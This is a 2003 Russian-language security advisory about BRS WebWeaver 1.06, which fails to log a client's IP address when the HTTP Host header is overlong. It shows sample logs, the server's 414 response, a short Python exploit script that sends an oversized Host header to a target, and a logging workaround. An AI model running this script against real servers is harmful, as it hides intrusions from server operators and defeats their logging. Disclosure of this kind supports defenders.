Security Lab

Недостаток в обработке некорректных запросов в BRS WebWeaver

Дата публикации:29.09.2003
Всего просмотров:1185
Опасность:
Низкая
Наличие исправления: Да
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации: Удаленная
Воздействие: Спуфинг атака
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: BRS WebWeaver 1.x
Уязвимые версии: BRS WebWeaver 1.x

Описание: Уязвимость обнаружена в BRS WebWeaver. Удаленный атакующий может выполнить HTTP запрос, в котором не будет зарегистрирован IP адрес.

WebWeaver 1.06 и, вероятно, предыдущие версии, позволяет `анонимный серфинг' при помощи некоторого трюка. Если HTTP `Host' заголовок в HTTP запросе к серверу будет лишком длинным, то Webweaver не запишет ваш адрес IP в лог-файл:

 
HTTP Server Started - 24/Sep/2003:18:13:39
10.0.0.6 - - [24/Sep/2003:18:15:01] "GET / HTTP/1.1" 304  "-" "-"
10.0.0.6 - - [24/Sep/2003:18:15:03] "GET / HTTP/1.1" 304  "-" "-"
 - - [24/Sep/2003:18:15:14] "GET / HTTP/1.1" 414  "-" "-"
 - - [24/Sep/2003:18:16:01] "GET / HTTP/1.1" 414  "-" "-"
 - - [24/Sep/2003:18:16:11] "GET / HTTP/1.1" 414  "-" "-"
Ответ сервера HTTP:
HTTP/1.0 414 Request-URI Too Large
Sever: BRS WebWeaver/1.06
Date: Wed, 24 Sep 2003 14:16:11 GMT
Content-Type: text/html

<HTML><HEAD><TITLE>414 Request-URI Too Large</TITLE></HEAD><BODY><H1>414 Request
-URI Too Large</H1>The requested URL's length exceeds the capacity limit for thi
s server.</BODY></HTML>

Пример/Эксплоит:

#! /usr/bin/env python
##
# by euronymous [ http://f0kp.iplus.ru ]
#
# Usage: ./WWanon.py <target_host>
##

import sys, socket

H0ST = sys.argv[1]
BUF = 'fp' * 0x815F
f = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
f.connect((H0ST,80))
f.send('GET / HTTP/1.1\r\n')
f.send('Host: '+BUF+'\n\n') 
WWout = f.recv(1024)
f.close()
print WWout

URL производителя:http://www.brswebweaver.com/

Решение:Регистрируйте запросы другими способами (firewall, IDS)

Ссылки: BRS WebWeaver: Анонимный серфинг